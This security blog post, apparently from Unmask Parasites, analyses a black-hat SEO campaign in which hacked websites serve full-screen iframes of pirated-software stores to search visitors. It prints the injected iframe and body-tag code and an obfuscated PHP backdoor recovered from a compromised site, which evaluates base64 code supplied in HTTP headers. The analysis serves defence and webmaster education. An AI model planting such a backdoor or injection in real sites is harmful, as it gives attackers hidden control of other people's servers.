Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Hackers Turn Legitimate Websites into Underground Software Stores

   10 Dec 10   Filed in Website exploits

This is the time of the year when online sellers do their best to attract herds of holiday shoppers. Software pirates are no different. They offer huge discounts (up to 95%) for popular and expensive software products and provide user-friendly online stores. They even made their sites one step closer to you!

I’ve already written about black hat SEO schemes that pirates use to drive traffic to their sites. They all include compromising established legitimate sites and poisoning first pages of Google’s search results with links to doorway pages on hacked sites that redirect searchers further to illegal stores on servers controlled by criminals.

The doorway pages on legitimate websites is an important part of the scheme

  • They are the pages that pirates promote in search engines
  • They take advantage of established reputation of hacked site — thus require less efforts to reach high rankings
  • They channel search traffic to underground websites
  • They hide underground websites from search engines
  • They transparently redirect traffic to new sites when criminals change domain names of their resources.

Eliminating doorway pages

However, there is a new development in this area. Instead of placing just doorway pages on compromised sites, hackers now create whole online stores there.

Here’s how it works: The keyword-rich spammy web pages on hacked sites check whether a visitor comes from a search engine and inject a full screen iframe at the very top of a web page. The iframe contains a familiar “software discounter” online store (identical to the ones I wrote before).

software discounter in an iframe

Note the double scrollbars on the screenshot — one pair of scrollbars belong to an iframe and the other to the entire web page. If you scroll down, you’ll see normal content of that web page.

Not every visitor from search engines can see that iframe. If a search query includes a “site:” operator, the iframe won’t be injected into the landing pages. Probably, the idea was to hide the shop from webmasters who use the “site:” searches. However the implementation of this idea is quite stupid — while the shop iframe is not visible, the spammy content on the landing page remains intact — a webmaster will be immediately aware of the compromise.

Local store pages

Although iframes allow to load web pages from third-party sites, in this case they load the “shop” pages from the same site. Here is a typical iframe code injected at the very bottom of a landing page:

<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y3Abo3Nip2IupzAbYm9mCJSlL2ucL2SxWzAjow02ZwD%3D&nd=Ym92pUW4CGRzpUW4CJ5IEGOjHJWcJGWeL3S6FTqjZwy6pIIkqKO6FTuirxxjJGAOLz8mGzyjZxy1pUcOLyygBJ1QFyAfGQW1L0jlH3uKrxSdo3pjZyc3EPHmEN%3D%3D"></iframe>

To make sure that styles and scripts on a hijacked web page don’t interfere with the shop iframe, hackers make the following change to the <body> tag:

<body style="margin:0px;padding:0px;width:100%;height:100%"><script>document.write('<noscript>');</script>

All images and style sheets are also loaded from the same domain. They all have similar URL structure. Something like this:


The indexed landing pages have URLs that also follow specific pattern: or

This makes me think that index files on these sites contain injected code that processes requests with specific parameters to generate spammy landing pages (?word=number) and “shop” web pages (?vprx=1&prx=….)

Here is a list of real landing pages on compromised sites.

Poisoned search results

These rogue sites do pretty well in search results

buy Graphisoft ArchiCAD
"buy discount Dragon NaturallySpeaking 10"

On the latter screenshot, you can see how Google thinks that the rogue site on matches the query (that returns 178,000 results) so well that it deserves 3 positions on the first page of search results plus the “+ show more results from” link.


Maybe it’s just a coincidence, but about 85% of the hacked sites with installed pirated software stores were found on different IPs on DreamHost networks:

  • 5 sites on – (United States Brea New Dream Network Llc)
  • 9 sites on – (United States Brea New Dream Network Llc)
  • 16 sites on – (United States Brea New Dream Network Llc)

Most of these sites are on shared servers. And when I check other sites on those servers I usually find a few more sites with spammy links and doorway pages.

This sort of hacked sites distribution makes me suspect that DreamHost servers are somehow attractive to hackers. Probably, there is a way for attackers to hop from server to server and search for hackable sites.

The same black-hat SEO campaign

As far as I can see, the rogue software stores on hacked legitimate sites are basically the same as the ones on dedicated servers that I described both last week and a year ago. Their look&feel is the same, and on the final “checkout” step, they redirect to well-known “paym8″ sites (e.g. payment8ltd .net/shop/order/ or 8payment. net/shop/order/).

I still don’t have enough information on how these shops work internally. I tried to contact webmasters of compromised sites, but at this point only received a couple of backdoor scripts. For example this file called .php:

$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70 \x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1 FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');

which translates to something like this:

eval('eval("if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b' and isset($_SERVER['HTTP_X_CODE']))

To webmasters

I guess, it is clear that illegal online stores create serious problems for owners of compromised sites. Not only can they hurt search engine ranking for normal keywords and incur penalties, but also may be a reason to remove your website from a server (most hosting ToS prohibit selling pirated software).

Please check my doorway/spammy links detection instructions that I posted last week — they are also useful for revealing any unwanted content on your site, including such rogue stores.

You should also regularly check access logs (not just Google Analytics that only tracks visitors with enabled JavaScript) for suspicious requests — they may help you identify backdoor scripts, vulnerable files and rogue sections of your site. Pay a special attention to POST requests.

Make sure that your files and directories are not world-writable. Leaving anything where your server neighbors can write to is an invitation to abuse your site.

Finally, if you find one of such shops on you site, you should contact the pirates (they provide a toll-free contact phone number +1-866-576-8741) and ask for your share in sales (don’t agree on less than 50%).

As always, I’m interested in any internal information about this sort of hacks. If you are a webmaster of a hacked site, or a representative of a hosting provider, please share your finding here in comments, or, if you don’t want to publicly disclose any sensitive information you can contact me directly. Thanks

Related posts:

Reader's Comments (2)

  1. |

    […] This post was mentioned on Twitter by John Mueller and Denis, PhysicalDrive0. PhysicalDrive0 said: RT @unmaskparasites: [blog] Hackers Turn Legitimate Websites into Underground Software Stores – doorways are not enough […]

  2. |

    If you look at the site similar to the one mentioned above ( do a reverse DNS lookup, you will see it is hosted in Hong Kong, including the Secure Payment Site.

    They claim to be in Georgia.

    So, it’s always a good idea to do this on any site you are unsure of. It is no guarantee but at least you can see if they are where they say they are.

    I used this site to do the lookup (I am not associated with this site)